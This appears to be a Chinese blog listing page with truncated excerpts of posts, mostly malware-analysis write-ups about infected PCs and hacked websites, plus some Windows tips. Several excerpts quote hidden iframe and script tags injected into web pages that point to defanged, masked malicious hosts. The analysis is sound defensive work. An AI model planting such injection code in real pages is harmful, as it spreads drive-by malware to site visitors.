其他

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&

endurer 原創2007-06-11 第1版今天在使用Web郵箱時，Kaspersky報告：/---已檢測到: 惡意程式 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm---/Google搜尋了一下，發現此代碼是一種ARP病毒添加的。檢查發現網頁都被加入了代碼：/---＜iframe SRC="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1"

用MASM32寫的 HttpRead 0.0.0001 beta4一、功能簡介　　讀取多個網頁內容，下載多個網路檔案。　　主要用於讀取惡意網頁代碼，下載通過網頁傳播的惡意程式檔案。二、　　1、http://purpleendurer.ys168.com　　2、http://download.csdn.net/source/417232檔案說明符 : D:/masm32/myworks/http/HttpRead-0_0_0001-Beta4.exe屬性 : A---語言 :

RootKit.Win32.Agent,Trojan.PSW.Win32.GameOnline,Trojan.Win32.Mnless等1endurer 原創2007-12-07 第1版一位網友說他的電腦運行很慢，不停地提示d3d.exe出錯，讓偶幫忙檢查一下。把pe_xscan 傳給他掃描 log 傳過來。經分析發現如下可疑項： /===pe_xscan 07-12-02 by Purple Endurer2007-12-7 12:25:24Windows XP Service Pack 2(

資訊源:駭客基地 作者:我不是天使  　　相信很多人都有和筆者一樣的經曆，由WIN XP構成的網路所有設定和由WIN 2000構成的完全一樣，但還是出現了根本不能訪問的情況，筆者認為這主要是因為XP的安全設定和2000不一樣所導致。針對這個問題筆者在網上查了一些資料，並將各種網上提供的常見解決方案做了相應測試，現在整理介紹給大家，希望能對遇到此問題的網友有所協助，並請高手繼續指點。部分內容摘自網路，請原諒不一一註明出處。

endurer 原創2007-06-13 第1版Kaspersky 報告：/---已檢測到: 木馬程式 Trojan-Downloader.JS.Agent.ht 指令碼: hxxp://www.a*b***c.cn/system/login.asp?Type=logout[2]已檢測到: 惡意程式 Exploit.Win32.IMG-ANI.aj URL: hxxp://www.i*f5*6***.cn/ad.jpg---/檢查網頁源檔案，發現ARP病毒自動加入代碼：/---＜iframe

作者： techrepublic.com.comThursday, March 10 2005 1:48 PM 學習在Win2K/XP用戶端上刪除EFS需要採取的必要步驟。現在絕大多數的讀者可能已經聽說過EFS了，它是微軟Windows 2000和Windows XP Professional系統中所包含的加密檔案系統（Encrypting File System）。該檔案系統允許Windows

endurer 原創2007-04-19 第1版植入的代碼為：/---＜iframe src=hxxp://www.y*xg**m7****8.com/y*x.htm width=0 height=0＞＜/iframe＞---/hxxp://www.y*xg**m7****8.com/y*x.htm 包含代碼：/---＜iframe src="hxxp://l****l*8**0.com/x**x/x**x.htm" width=1 height=1＞＜/iframe＞---/hxxp://l*

某農業產品貿易網掛馬Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu endurer 原創2008-09-29 第1版 發現了挺久了，不過現在才有時間來分析一下。 該網頁面發現代碼：/---＜script language="javascript" type="text/javascript" src="hxxp://a*lim*o*ma*.com/header_bg.gif"＞＜/script＞---/#1

近來有不少朋友詢問 pe_xscan 的 log 中的項目 與 瑞星卡卡上網安全助手 之間的對應的關係，看來有必要參照 瑞星卡卡上網安全助手 改進一下 pe_xscan 的log的顯示內容……就從 O10 -Winsock LSP 項開始罷。新的log顯示格式為：O10 - LSP: MSAFD Tcpip [TCP/IP] = C:/WINDOWS/system32/mswsock.dll | 2004-8-17 12:0:0 | Microsoft(R) Windows(R)

繞過IceSword檔案檢測的Trojan-Downloader.Win32.Hmir.hw/Trojan.Win32.Mnless.zpc/ojj6erv.sysendurer 原創2007-11-27 第1版一位網友說他前兩天瀏覽一個文學網站時中毒，現在電腦每天都能用殺毒軟體掃描出一些網遊盜號木馬、QQ盜號木馬等病毒。現在開機出現提示框，提示找不到檔案f5bk37q187.dll。IE首頁被改為 hxxp://***.k*zd**h.com/?g。讓偶幫忙檢查。下載 pe_xscan 掃描

beep.sys/Trojan.NtRootKit.1192,msplugplay 1005.sys/BackDoor.Pigeon.13201等2endurer 原創2008-06-25 第1版（續1）先修正電腦日期，然後下載 DrWeb CureIt!掃描。同時下載 bat_do、FileInfo 提取檔案資訊，打包備份，延時刪除。接著下載 瑞星卡卡安全助手清理惡意程式啟動項目。附1：部分惡意檔案資訊附2：DrWeb CureIt!掃描日誌附1：部分惡意檔案資訊檔案說明符 :

昨天發現偶的卡巴6不被支援了，於是卸載了……今天開啟電腦，發現硬碟燈沒亮，顯示器指示燈長時間閃爍，說明沒有接到主機的顯示訊號~昨天同事的電腦硬碟壞了，弄了一天~今天不會輪到我的了罷斷開電源，過了半分鐘再開，終於正常啟動了~進行案頭，開啟星空極速準備下載卡巴8，卻提示PPPOE有問題，建議重裝~重裝了還是不行本來就不喜歡星空極速這個東東，廣告多，只是Win 2000內建的拔號程式不行，沒辦法~這個Win

by  Greg Shultz Takeaway: The next time you need to identify the cause of a driver problem, turn to Windows XP's little-known troubleshooting tool called the Driver Verifier Manager. By going through a few short steps, you'll be able to determine

現在偶想讓偶的強制休息程式的剩餘時間提示視窗在螢幕右下角提示，但是不能擋住工作列，而要在工作列的上方這可能需要擷取工作列的高度Google了一下，這方面的資料不多，在百毒網站Baidu的個人空間找到了一段VB的代碼（Google的結果可以有BaiDu的東東，這才是幹大事的氣量和風度），加減乘除都用上了，不過沒看明白~還是自己查了一下API，找到了下面的方法（原始碼和可執行程式

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&

      螢幕截取是令人比較感興趣的事情.雖然現在有不少應用程式如HYPERSNAP等可以用來截取你所喜歡的螢幕畫面,但是如果能把這個功能加到自己的程式中,就更能利用它強大的作用. ---- 下面用VC來逐步介紹在Windows95下的實現過程.首先我們要確定螢幕截取的地區,用LPRECT結構來定義.可以截取一個視窗,或整個螢幕.以下代碼把選定的螢幕地區拷貝到位元影像中. HBITMAP CopyScreenToBitmap(LPRECT lpRect) //lpRect

轉自：http://www.xfocus.net/articles/200504/793.html建立時間：2005-04-13 更新時間：2005-04-14文章屬性：翻譯文章提交：sFqRy (mqphk163_at_163.com)作者：Thomas Kruse,nbw來源：The Assembly-Programming-Journal, Vol. 1, No. 1 (2004)http://www.Assembly-Journal.comAbstract概要Today nearly

endurer　原創2005.12.26　第2版 補充了瑞星的回複。2005.12.21　第1版以前在一些朋友發的HijackThis的LOG中發現過這個東東的啟動項。今天在一位網友的電腦上，抓到了這個東東的檔案。HijackThis掃描的LOG為：Logfile of HijackThis v1.99.1Scan saved at 17:27:26, on 2005-12-21Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet

某論壇被掛馬 down.exe / Virus.Win32.AutoRun.z  / Trojan.PWS.Maran.262endurer 原創2007-07-28 第2版 補充 Kaspersky 的回複2007-07-28